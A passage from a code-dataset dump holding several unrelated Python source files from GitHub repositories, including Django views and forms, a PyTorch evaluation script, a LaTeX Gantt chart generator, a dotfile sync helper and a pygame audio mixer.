data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n updated_perk = serializer.save()\n return Response(\n PerkSerializer(updated_perk).data,\n )\n else:\n return Response(serializer.errors)\n\n def delete(self, request, pk):\n perk = self.get_object(pk)\n perk.delete()\n return Response(status=HTTP_204_NO_CONTENT)","repo_name":"crosswalkso/airbnb_clone","sub_path":"airbnb-clone-backend/experiences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35226558058","text":"import argparse\nimport torch\nimport ns.utils as utils\nimport os\nimport pickle\n\nfrom torch.utils import data\nimport numpy as np\nimport ns.modules as modules\n\ntorch.backends.cudnn.deterministic = True\n\n\ndef evaluate(args, args_eval, model_file):\n\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n device = torch.device('cuda' if args.cuda else 'cpu')\n\n dataset = utils.PathDatasetStateIds(\n hdf5_file=args.dataset, path_length=10)\n eval_loader = data.DataLoader(\n dataset, batch_size=100, shuffle=False, num_workers=4)\n\n # Get data sample\n obs = eval_loader.__iter__().next()[0]\n input_shape = obs[0][0].size()\n\n model = modules.ContrastiveSWM(\n embedding_dim=args.embedding_dim,\n hidden_dim=args.hidden_dim,\n action_dim=args.action_dim,\n input_dims=input_shape,\n num_objects=args.num_objects,\n sigma=args.sigma,\n hinge=args.hinge,\n ignore_action=args.ignore_action,\n copy_action=args.copy_action,\n encoder=args.encoder).to(device)\n\n model.load_state_dict(torch.load(model_file))\n model.eval()\n\n hits_list = []\n\n with torch.no_grad():\n\n for batch_idx, data_batch in enumerate(eval_loader):\n\n data_batch = [[t.to(\n device) for t in tensor] for tensor in data_batch]\n\n observations, actions, state_ids = data_batch\n\n if observations[0].size(0) != args.batch_size:\n continue\n\n states = []\n for obs in observations:\n states.append(model.obj_encoder(model.obj_extractor(obs)))\n states = torch.stack(states, dim=0)\n state_ids = torch.stack(state_ids, dim=0)\n\n pred_state = states[0]\n if not args_eval.no_transition:\n for i in range(args_eval.num_steps):\n pred_trans = model.transition_model(pred_state, actions[i])\n pred_state = pred_state + pred_trans\n\n # pred_state: [100, |O|, D]\n # states: [10, 100, |O|, D]\n # pred_state_flat: [100, X]\n # states_flat: [10, 100, X]\n pred_state_flat = pred_state.reshape((pred_state.size(0), pred_state.size(1) * pred_state.size(2)))\n states_flat = states.reshape((states.size(0), states.size(1), states.size(2) * states.size(3)))\n\n # dist_matrix: [10, 100]\n dist_matrix = (states_flat - pred_state_flat[None]).pow(2).sum(2)\n indices = torch.argmin(dist_matrix, dim=0)\n correct = indices == args_eval.num_steps\n\n # check for duplicates\n if args_eval.dedup:\n equal_mask = torch.all(state_ids[indices, list(range(100))] == state_ids[args_eval.num_steps], dim=1)\n correct = correct + equal_mask\n\n # hits\n hits_list.append(correct.float().mean().item())\n\n hits = np.mean(hits_list)\n\n print('Hits @ 1: {}'.format(hits))\n\n return hits, 0.\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save-folder', type=str,\n default='checkpoints',\n help='Path to checkpoints.')\n parser.add_argument('--num-steps', type=int, default=1,\n help='Number of prediction steps to evaluate.')\n parser.add_argument('--dataset', type=str,\n default='data/shapes_eval.h5',\n help='Dataset string.')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disable CUDA training.')\n parser.add_argument('--no-transition', default=False, action='store_true')\n parser.add_argument('--dedup', default=False, action='store_true')\n\n args_eval = parser.parse_args()\n\n meta_file = os.path.join(args_eval.save_folder, 'metadata.pkl')\n model_file = os.path.join(args_eval.save_folder, 'model.pt')\n\n args = pickle.load(open(meta_file, 'rb'))['args']\n\n args.cuda = not args_eval.no_cuda and torch.cuda.is_available()\n args.batch_size = 100\n args.dataset = args_eval.dataset\n args.seed = 0\n\n evaluate(args, args_eval, model_file)\n","repo_name":"ondrejbiza/negative-sampling-icml-21","sub_path":"ns/scr/eval_ids_b_inep.py","file_name":"eval_ids_b_inep.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"37646915150","text":"from datetime import datetime\nfrom io import StringIO\n\nfrom .utility import write_output, format_latex\n\n__all__ = [\"gantt\", \"gantt_embedded\"]\n\n# Milestones with these prefixes are included when generating Gantt charts.\n# Note that some are not DM milestones, but are included for context.\nGANTT_MILESTONES = [\n \"LDM\",\n \"LSST-1200\",\n \"T&SC-1100-0900\",\n # \"COMC-1264\",\n # \"CAMM6995\", Dropped following LCR-1288.\n \"LSST-1220\",\n # \"T&SC-1150-0600\",\n \"LSST-1510\",\n \"LSST-1513\",\n # \"COMC-1664\",\n \"LSST-1520\",\n \"LSST-1540\",\n \"LSST-1560\",\n \"LSST-1620\",\n]\n\nGANTT_PREAMBLE_EMBEDDED = \"\"\"\n\\\\begin{ganttchart}[\n expand chart=\\\\textwidth,\n title label font=\\\\sffamily\\\\bfseries,\n milestone label font=\\\\scriptsize,\n progress label text={#1},\n milestone progress label node/.append style={right=1.4cm},\n y unit chart=0.4cm,\n y unit title=0.7cm\n]{1}{149}\n \\\\gantttitle{}{6} \\\\gantttitle{2018}{12} \\\\gantttitle{2019}{12}\n \\\\gantttitle{2020}{12} \\\\gantttitle{2021}{12} \\\\gantttitle{2022}{12}\n \\\\gantttitle{2023}{12} \\\\gantttitle{2024}{12} \\\\gantttitle{2025}{12}\n \\\\gantttitle{Operations}{47} \\\\\n \\\\ganttnewline\\n\n\"\"\"\n\nGANTT_POSTAMBLE_EMBEDDED = \"\"\"\n\\\\end{ganttchart}\n\"\"\"\n\nGANTT_PREAMBLE_STANDALONE = \"\"\"\n\\\\documentclass{article}\n\\\\usepackage[\n paperwidth=37cm,\n paperheight=28cm, % Manually tweaked to fit chart\n left=0mm,\n top=0mm,\n bottom=0mm,\n right=0mm,\n noheadfoot,\n marginparwidth=0pt,\n includemp=false\n]{geometry}\n\\\\usepackage{pgfgantt}\n\\\\begin{document}\n\\\\begin{center}\n\\\\begin{ganttchart}[\n% vgrid, % disabled for aesthetic reasons\n% hgrid, % disabled for aesthetic reasons\n expand chart=0.98\\\\textwidth,\n title label font=\\\\sffamily\\\\bfseries,\n milestone label font=\\\\sffamily\\\\bfseries,\n progress label text={#1},\n milestone progress label node/.append style={right=2.2cm},\n milestone progress label font=\\\\sffamily,\n y unit chart=0.55cm,\n y unit title=0.8cm\n]{1}{126}\n \\\\gantttitle{}{6} \\\\gantttitle{2018}{12} \\\\gantttitle{2019}{12}\n \\\\gantttitle{2020}{12} \\\\gantttitle{2021}{12} \\\\gantttitle{2022}{12}\n \\\\gantttitle{2023}{12} \\\\gantttitle{2024}{12} \\\\gantttitle{2025}{12}\n \\\\gantttitle{Operations}{24} \\\\\n \\\\ganttnewline\\n\n\"\"\"\n\nGANTT_POSTAMBLE_STANDALONE = \"\"\"\n\\\\end{ganttchart}\n\\\\end{center}\n\\\\end{document}\n\"\"\"\n\n\ndef format_gantt(milestones, preamble, postamble, start=datetime(2017, 7, 1)):\n def get_month_number(start, date):\n # First month is month 1; all other months sequentially.\n return 1 + (date.year * 12 + date.month) - (start.year * 12 + start.month)\n\n def get_milestone_name(code):\n return code.lower().replace(\"-\", \"\").replace(\"&\", \"\")\n\n output = StringIO()\n output.write(preamble)\n\n for ms in sorted(milestones, key=lambda x: x.due):\n # A comma in the name causes a problem; escape with \\\\\n name = ms.short_name.replace(\",\", \"\\\\,\")\n output_string = (\n f\"\\\\ganttmilestone[name={get_milestone_name(ms.code)},\"\n f\"progress label text={name}\"\n f\"\\\\phantom{{#1}},progress=100]{{{ms.code}}}\"\n f\"{{{get_month_number(start, ms.due)}}} \\\\ganttnewline\"\n )\n output.write(format_latex(output_string))\n # format_latex() strips trailing newlines; add one for cosmetic reasons\n output.write(\"\\n\")\n\n for ms in sorted(milestones, key=lambda x: x.due):\n for succ in ms.successors:\n if succ in [milestone.code for milestone in milestones]:\n output.write(\n \"\\\\ganttlink{{{}}}{{{}}}\\n\".format(\n get_milestone_name(ms.code), get_milestone_name(succ)\n )\n )\n\n output.write(postamble)\n return output.getvalue()\n\n\ndef gantt_standalone(milestones):\n milestones = [\n ms\n for ms in milestones\n for gantt in GANTT_MILESTONES\n if ms.code.startswith(gantt)\n ]\n return format_gantt(\n sorted(milestones, key=lambda x: (x.due, x.code)),\n GANTT_PREAMBLE_STANDALONE,\n GANTT_POSTAMBLE_STANDALONE,\n )\n\n\ndef gantt_embedded(milestones):\n milestones = [\n ms\n for ms in milestones\n for gantt in GANTT_MILESTONES\n if ms.code.startswith(gantt)\n ]\n return format_gantt(\n sorted(milestones, key=lambda x: (x.due, x.code)),\n GANTT_PREAMBLE_EMBEDDED,\n GANTT_POSTAMBLE_EMBEDDED,\n )\n\n\ndef gantt(args, milestones):\n if args.embedded:\n tex_source = gantt_embedded(milestones)\n else:\n tex_source = gantt_standalone(milestones)\n write_output(args.output, tex_source)\n","repo_name":"lsst-dm/milestones","sub_path":"milestones/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13010482719","text":"points = []\nmaxx=0\nmaxy=9\nfor line in open(\"C:\\\\Users\\\\anant\\\\PythonProjects\\\\AdventOfCode\\\\day13\\\\inp13.txt\"):\n if line!='\\n':\n points.append(list(map(int,line.strip().split(\",\"))))\n maxx = max(maxx, points[-1][0])\n maxy = max(maxy, points[-1][1])\n else:\n break\nboard = [[\"1\" for i in range(maxx+1)] for j in range(maxy+1)]\nfor point in points:\n board[point[1]][point[0]]=\"#\"\ninst = \"x\"\nval = 655\n\nfor i in range(len(board)):\n for j in range(val+1):\n if board[i][len(board[0])-j-1] == \"#\":\n board[i][j] = board[i][len(board[0])-j-1]\nnew_board = []\nfor row in board:\n new_board.append(row[:val])\nboard = new_board\na = 0\nfor i in range(len(board)):\n a+=board[i].count(\"#\")\nprint(a)\n","repo_name":"OneBitPython/AdventOfCode","sub_path":"2021/day13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24549377592","text":"from optparse import OptionParser\n\nfrom console.application import runGet, runView, runAppendSynonym\nfrom gui.application import run\n\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"--get\",\n dest=\"get\",\n help=\"Get the statistic for the resource\")\n parser.add_option(\"--view\",\n dest=\"view\",\n help=\"View the statistic for the resource\")\n parser.add_option(\"--shortname\",\n dest=\"shortName\",\n help=\"Append short name for the resource\")\n parser.add_option(\"--fullname\",\n dest=\"fullName\",\n help=\"Append full name for the resource\")\n\n\n (options, _) = parser.parse_args()\n\n if options.get is not None:\n runGet(options.get)\n elif options.view is not None:\n runView(options.view)\n elif options.shortName is not None and options.fullName is not None:\n runAppendSynonym(options.shortName, options.fullName)\n else:\n run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndrewZ1989/TagCounter","sub_path":"tagcounter/tagcounter.py","file_name":"tagcounter.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12097978405","text":"\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom photos.models import Image\nfrom photos.widgets import TableCheckboxSelectMultiple\n\nfrom tribes.forms import GroupForm\nfrom django.forms.models import ModelForm\n\n\nclass PhotoUploadForm(GroupForm):\n \n title = forms.CharField(required=False)\n \n class Meta:\n model = Image\n exclude = [\"member\", \"photoset\", \"title_slug\", \"effect\", \"crop_from\", 'group_content_type', 'group_object_id']\n \n def clean_title(self):\n if not self.cleaned_data[\"title\"]:\n self.cleaned_data[\"title\"] = self.cleaned_data[\"image\"].name\n return self.cleaned_data[\"title\"]\n \n def clean_image(self):\n if \"#\" in self.cleaned_data[\"image\"].name:\n raise forms.ValidationError(\n _(\"Image filename contains an invalid character: '#'. Please remove the character and try again.\"))\n return self.cleaned_data[\"image\"]\n \n def clean(self):\n self.check_group_membership()\n return super(PhotoUploadForm, self).clean()\n \n\n\n\nclass PhotoEditForm(ModelForm):\n \n class Meta:\n model = Image\n exclude = [\n \"member\",\n \"photoset\",\n \"title_slug\",\n \"effect\",\n \"crop_from\",\n \"image\",\n 'group_content_type', 'group_object_id',\n ]\n \n def __init__(self, user=None, *args, **kwargs):\n self.user = user\n super(PhotoEditForm, self).__init__(*args, **kwargs)\n\nclass FacebookPhotosForm(forms.Form):\n \"\"\"\n Maybe used for album ids (aids) or picture ids (pids)\n \"\"\"\n \n selected_ids = forms.MultipleChoiceField(required=False, label='')\n \n def __init__(self, objects=(), initial=[], *args, **kwargs):\n super(FacebookPhotosForm, self).__init__(*args, **kwargs)\n # set choice field's choices dynamically\n choices = [(obj['aid'], obj['name']) for obj in objects]\n thumbs = [obj['thumb_url'] for obj in objects]\n self.fields['selected_ids'].choices = choices \n self.fields['selected_ids'].initial = initial \n self.fields['selected_ids'].widget = TableCheckboxSelectMultiple(choices=choices, thumb_urls=thumbs, cols_count=3)","repo_name":"oppian/oserver","sub_path":"apps/photos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13036495200","text":"from osgeo import gdal\n\nfileformat = \"NITF\"\ndriver = gdal.GetDriverByName(fileformat)\nmetadata = driver.GetMetadata()\nif metadata.get(gdal.DCAP_CREATE) == \"YES\":\n print(\"Driver {} supports Create() method.\".format(fileformat))\n\nif metadata.get(gdal.DCAP_CREATECOPY) == \"YES\":\n print(\"Driver {} supports CreateCopy() method.\".format(fileformat))\n\n\ndst_ds = driver.Create(\"blank.tif\", xsize=2345, ysize=3844,\n bands=8, eType=gdal.GDT_Byte)\n\n\ndst_ds = None\n","repo_name":"lamchunying/NITF_Files","sub_path":"blank.py","file_name":"blank.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27714980353","text":"# script to push repos to github\nfrom time import localtime, strftime\nimport os\nimport fire\nimport subprocess\n\n# vars\nname = os.environ['USER']\ntime = strftime(\"%Y-%m-%d %H:%M:%S\", localtime())\ndotLoc = '/home/{}/m/dot'.format(name)\nvimLoc = '/home/{}/m/vim'.format(name)\ndotList = [\n '/home/{}/.vimrc'.format(name),\n '/home/{}/.config/ion/initrc'.format(name),\n '/home/{}/.config/alacritty/alacritty.yml'.format(name),\n '/home/{}/.tmux.conf.local'.format(name),\n]\n\n\ndef sub(command, loc):\n p = subprocess.Popen(\n command,\n cwd=loc,\n stdout=subprocess.PIPE\n )\n for line in iter(p.stdout.readline, b''):\n print('>>> {}'.format(line.rstrip().decode('utf-8')))\n\n\ndef rsyncList(loc):\n return [[\n 'rsync',\n '-av',\n '-P',\n '--outbuf=L',\n '{}'.format(l),\n '{}'.format(loc)] for l in dotList]\n\n\ndef push(loc):\n sub(['git', 'add', '-A'], loc)\n sub(['git', 'commit', '-m', '\"{}\"'.format(time)], loc)\n sub(['git', 'push'], loc)\n\n\ndef dot():\n [sub(l, dotLoc) for l in rsyncList(dotLoc)]\n push(dotLoc)\n\n\ndef vim():\n push(vimLoc)\n\n\ndef all():\n dot()\n vim()\n\n\nif __name__ == '__main__':\n fire.Fire()\n","repo_name":"icew4ll/git","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42486711952","text":"from logging.handlers import TimedRotatingFileHandler\nfrom sources.framework.common.logger.message_type import MessageType\nimport configparser\nimport logging\nimport os\n\n\nclass Logger:\n\n def __init__(self):\n self.logger = logging.getLogger(\"emsxapi\")\n self.config = configparser.ConfigParser()\n self.config.read(\"configs/logger.ini\")\n self.level = int(self.config['DEFAULT']['level'])\n self.log_dir = self.config['DEFAULT']['log_dir']\n self.when_to_rotate = self.config['DEFAULT']['when_to_rotate']\n self.backup_count = int(self.config['DEFAULT']['backup_count'])\n self.log_file_name = self.config['DEFAULT']['log_file_name']\n\n def use_timed_rotating_file_handler(self):\n \"\"\"\n\n \"\"\"\n if self.level is None:\n self.level = logging.INFO\n\n log_path = os.path.join(self.log_dir, self.log_file_name)\n\n main_formatter = logging.Formatter(\n fmt='%(asctime)s [%(module)s %(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n console_handler = logging.StreamHandler()\n file_handler = TimedRotatingFileHandler(\n filename=log_path, when=self.when_to_rotate, backupCount=self.backup_count)\n\n for handler in [console_handler, file_handler]:\n handler.setFormatter(main_formatter)\n self.logger.addHandler(handler)\n self.logger.setLevel(self.level)\n\n def print(self, msg, msg_type):\n \"\"\"\n\n Args:\n msg ():\n msg_type ():\n \"\"\"\n if msg_type == MessageType.CRITICAL:\n self.logger.critical(msg)\n if msg_type == MessageType.ERROR:\n self.logger.error(msg)\n if msg_type == MessageType.WARNING:\n self.logger.warning(msg)\n if msg_type == MessageType.INFO:\n self.logger.info(msg)\n if msg_type == MessageType.DEBUG:\n self.logger.debug(msg)\n","repo_name":"FerGusMosca/MissisipiCapital_DayTradyingPlatform","sub_path":"day_trader/sources/framework/common/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"772717858","text":"import matplotlib.pyplot as plt\nfrom math import sqrt, floor, ceil\nfrom matplotlib.transforms import Bbox\nimport pandas as pd\nimport numpy as np\n\ndef up_bound(t, n=256):\n result = 0\n try:\n result = n/(2 * sqrt((n-t)*t))\n except ValueError:\n pass\n except ZeroDivisionError:\n print('Error zero div with n=',n,', t=',t)\n return (9/2) * result\n\nif __name__ == '__main__':\n\n results = pd.read_csv('../final_new.csv').transpose()\n\n total = results.transpose().mean()\n total.plot(kind = 'bar', fc=(0,0,1,0.5))\n\n up_line = []\n for i in range(len(results.index)): \n max = results.iloc[i].max()\n min = results.iloc[i].min()\n \n plt.plot(i,max,'bo')\n plt.plot(i,min,'bo')\n #plt.vlines(i, min, max)\n std = results.iloc[i].std()\n mean = results.iloc[i].mean()\n plt.vlines(i, mean - std, mean + std)\n\n x = [i+0.25 for x in range(len(results.iloc[i]))]\n plt.plot(x,results.iloc[i],'-ok')\n\n t = int(results.index[i])\n up_line.append(up_bound(t))\n plt.plot(up_line, color = 'red')\n plt.title('All plots')\n\n plt.show() ","repo_name":"Teyal/TCC","sub_path":"grover-sat/crossover/src/print_results.py","file_name":"print_results.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41290743418","text":"class NamedDict(dict):\n def __getattr__(self, name):\n try:\n return self[name]\n except KeyError:\n raise AttributeError(f'No key: {name} in NamedDict. ')\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nenviron_config = NamedDict({\n 'reward_params': (15, 5, 1, 1),\n})\n","repo_name":"ASSANDHOLE/EMO-RL-UAV","sub_path":"gym_uav/env/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42942567325","text":"from script.test_login import *\nfrom script.wwtest_SandBox import *\nfrom script.edtest_adddata import *\n\n\nif __name__ == '__main__':\n login=Login()\n chrome=login.test_login() #登录\n\n sanbox=CreateSandBox(chrome) #实例化沙盒类\n sanbox.test_createsandbox() #新建沙盒\n\n data=SandData(chrome)#实例化数据源\n data.test_adddata() #添加数据源","repo_name":"kongwd555/UI_test","sub_path":"script/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14051588219","text":"import csv, io\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom ..models import Student, StudentGroup\n\n\n# imports a csv file with students for a specific group\ndef import_students_togroup(request):\n if request.method == 'POST':\n group_id = request.POST.get('group_id')\n group = StudentGroup.objects.get(id=group_id)\n csvfile = request.FILES['csvfile']\n if csvfile.name.endswith('.csv'):\n csvdata = csvfile.read().decode('utf-8')\n datastream = io.StringIO(csvdata)\n\n reader = csv.reader(datastream, delimiter=',', quotechar='\"')\n student_list = []\n for row in reader:\n student = Student(\n first_name = row[0],\n last_name = row[1],\n student_custom_id = row[2],\n student_group = group\n )\n student_list.append(student)\n if len(student_list) > 0:\n Student.objects.bulk_create(student_list)\n return HttpResponseRedirect(reverse('instructor:studentgroupdetails', args=(group_id,)))\n else:\n return HttpResponse('Only csv files are supported')\n else:\n raise Http404\n","repo_name":"robertdroptablestudents/sqlgrader","sub_path":"webui/instructor/views/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"28419063646","text":"from mpi4py import MPI\nimport numpy as np\nimport mkl,time\n\n__all__=[]\n\nmkl.set_num_threads(1)\ncomm=MPI.Comm.Get_parent()\nvecs,lczs,indices=comm.recv(source=0,tag=0)\ndata=[]\nfor index,lanczos in zip(indices,lczs):\n stime=time.time()\n Q=np.zeros((vecs.shape[0],lanczos.maxiter),dtype=vecs.dtype)\n while lanczos.niter Node:\n if not node:\n return None\n\n hashmap = {\n node.val: Node(node.val)\n }\n\n # BFS\n queue = [node]\n visited = set()\n visited.add(node.val)\n\n while len(queue) > 0:\n visitedNode = queue.pop(0)\n visited.add(visitedNode.val)\n # print(\"Visited Node - \", visitedNode.val)\n\n if visitedNode.neighbors is None:\n continue\n\n for neighborNode in visitedNode.neighbors:\n if neighborNode.val not in visited:\n queue.append(neighborNode)\n visited.add(neighborNode.val)\n hashmap[neighborNode.val] = Node(neighborNode.val)\n\n if hashmap[visitedNode.val].neighbors is None:\n hashmap[visitedNode.val].neighbors = []\n hashmap[visitedNode.val].neighbors.append(hashmap[neighborNode.val])\n\n return hashmap[node.val]\n\n\nif __name__ == \"__main__\":\n pass","repo_name":"tahmid-tanzim/problem-solving","sub_path":"Trees_and_Graphs/clone-graph.py","file_name":"clone-graph.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42559742845","text":"import os\nimport math\nimport pygame\nimport random\nfrom scripts import functions\n\n\nclass Mixer:\n \"\"\"Mixer is a class to handle all the music and sound of the game\"\"\"\n def __init__(self, path: str):\n\n # PROPERTIES\n self.path = os.path.dirname(path)\n self.music_path = functions.resource_path(f'{self.path}/audio/music')\n self.sound_path = functions.resource_path(f'{self.path}/audio/sounds')\n\n # SONGS AND SOUNDS\n self.volume = 1\n self.next_song = ''\n self.playing = False\n self.current_song = ''\n\n # LOAD SONGS\n self.songs = [\n functions.resource_path(f'{self.music_path}/{song}')\n for song in os.listdir(self.music_path)\n ]\n\n # LOAD SOUNDS\n self.sounds = {\n sound:pygame.mixer.Sound(functions.resource_path(f'{self.sound_path}/{sound}'))\n for sound in os.listdir(self.sound_path)\n }\n\n # EVENTS\n pygame.mixer.music.set_endevent(pygame.USEREVENT)\n\n def set_music_volume(self, volume: int) -> None:\n \"\"\"Sets the volumen of the music\"\"\"\n self.volume = volume/100\n pygame.mixer.music.set_volume(self.volume)\n \n def set_sound_volume(self, volume: int, play_sound: bool=True) -> None:\n \"\"\"Sets the volume of the sounds\"\"\"\n for sound in self.sounds.values():\n sound.set_volume(volume/100)\n if play_sound: self.play_sound('move.wav')\n\n def load_queue(self) -> None:\n \"\"\"Loads the next song in queue\"\"\"\n while True:\n song = random.choice(self.songs)\n if song != self.current_song: break\n pygame.mixer.music.queue(song)\n pygame.mixer.music.set_volume(self.volume)\n self.next_song = song\n \n def play(self, loops: int=0) -> None:\n \"\"\"Plays the songs\"\"\"\n self.playing = True\n pygame.mixer.music.load(self.current_song)\n pygame.mixer.music.set_volume(self.volume)\n pygame.mixer.music.play()\n \n def start(self, song=None) -> None:\n \"\"\"Inits the mixer\"\"\"\n if not song: song = random.choice(self.songs)\n self.current_song = song\n self.play()\n self.load_queue()\n\n def stop(self) -> None:\n \"\"\"Stops the mixer\"\"\"\n pygame.mixer.music.stop()\n \n def next(self) -> None:\n \"\"\"Loads the next song and updates the new\"\"\"\n self.current_song = self.next_song\n self.load_queue()\n self.play()\n\n def play_sound(self, sound: str) -> None:\n \"\"\"Plays a sound\"\"\"\n pygame.mixer.Sound.play(self.sounds[sound])\n \n def pause(self) -> None:\n \"\"\"Pauses the mixer\"\"\"\n self.playing = False\n pygame.mixer.music.pause()\n \n def unpause(self) -> None:\n \"\"\"Unpauses the mixer\"\"\"\n self.playing = True\n pygame.mixer.music.unpause()\n","repo_name":"TheCodingStudent/Star-Chess","sub_path":"audio/mixer.py","file_name":"mixer.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33177079157","text":"import cv2\nimport numpy\nimport h5py\nimport keras\nfrom keras.models import load_model\nimport numpy as np\nmodel = load_model('keras-mnist-model.h5')\n\ndef infer(crop):\n image = np.reshape(crop,(-1,28,28,1))\n result = model.predict(image)\n result = result[0]\n #result = list(map(int,result))\n print(result)\n \n\n\n###CODE\n\ncam = cv2.VideoCapture(0)\n\nwhile True:\n ret,frame = cam.read()\n key = cv2.waitKey(1)\n flip = cv2.flip(frame,1)\n cv2.rectangle(flip,(50,50),(250,250),(0,0,255),1)\n roi = flip[60:250,60:250] ## size taken is 190x190\n roi_gray = cv2.cvtColor(roi,cv2.COLOR_BGR2GRAY)\n # thresh = cv2.adaptiveThreshold(roi,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)\n _,thresh = cv2.threshold(roi_gray,120,255,cv2.THRESH_BINARY)\n crop = cv2.resize(thresh,(28,28))\n '''\n crop = cv2.imread('./mnist_dream_10.png',0)\n _,thresh2 = cv2.threshold(crop,120,255,cv2.THRESH_BINARY)\n crop = cv2.resize(crop,(28,28))\n cv2.imshow(\"crop\",crop)\n '''\n infer(crop)\n cv2.imshow(\"frame\",roi)\n cv2.imshow(\"roi\",roi_gray)\n\n if key == ord('x'):\n break\n\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"huzefasr/Real-Time-mnist","sub_path":"scan_text.py","file_name":"scan_text.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17498317495","text":"import ZConfig\n\n\ndef substitute(s, mapping):\n \"\"\"Interpolate variables from `mapping` into `s`.\"\"\"\n if \"$\" in s:\n result = ''\n rest = s\n while rest:\n p, name, namecase, rest = _split(rest)\n result += p\n if name:\n v = mapping.get(name)\n if v is None:\n raise ZConfig.SubstitutionReplacementError(s, namecase)\n result += v\n return result\n else:\n return s\n\n\ndef isname(s):\n \"\"\"Return True iff s is a valid substitution name.\"\"\"\n m = _name_match(s)\n if m:\n return m.group() == s\n else:\n return False\n\n\ndef _split(s):\n # Return a four tuple: prefix, name, namecase, suffix\n # - prefix is text that can be used literally in the result (may be '')\n # - name is a referenced name, or None\n # - namecase is the name with case preserved\n # - suffix is trailling text that may contain additional references\n # (may be '' or None)\n if \"$\" in s:\n i = s.find(\"$\")\n c = s[i+1:i+2]\n if c == \"\":\n raise ZConfig.SubstitutionSyntaxError(\n \"illegal lone '$' at end of source\")\n if c == \"$\":\n return s[:i+1], None, None, s[i+2:]\n prefix = s[:i]\n if c == \"{\":\n m = _name_match(s, i + 2)\n if not m:\n raise ZConfig.SubstitutionSyntaxError(\n \"'${' not followed by name\")\n name = m.group(0)\n i = m.end() + 1\n if not s.startswith(\"}\", i - 1):\n raise ZConfig.SubstitutionSyntaxError(\n \"'${%s' not followed by '}'\" % name)\n else:\n m = _name_match(s, i+1)\n if not m:\n raise ZConfig.SubstitutionSyntaxError(\n \"'$' not followed by '$' or name\")\n name = m.group(0)\n i = m.end()\n return prefix, name.lower(), name, s[i:]\n else:\n return s, None, None, None\n\n\nimport re\n_name_match = re.compile(r\"[a-zA-Z_][a-zA-Z0-9_]*\").match\ndel re\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/ZopeInterface-3.1.0c1/Support/ZConfig/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"34159865273","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import StudentSerializer\nfrom .forms import StudentForm, UserForm\nfrom .models import Student, Track\n# Create your views here.\n\n\ndef home(request):\n all_students = Student.objects.all()\n context = {'student_list': all_students}\n return render(request, 'djapp/home.html', context)\n\n\ndef show(request, st_id):\n st = Student.objects.get(id=st_id)\n context = {'st': st}\n return render(request, 'djApp/show.html', context)\n\n\ndef del_St(request, st_id):\n st = Student.objects.get(id=st_id)\n st.delete()\n return redirect('home')\n\n\ndef addStudent(request):\n if request.method == 'POST':\n st_form = StudentForm(request.POST)\n if st_form.is_valid():\n st_form.save()\n return redirect('home')\n st_form = StudentForm()\n context = {'form': st_form}\n return render(request, 'djApp/add-student.html', 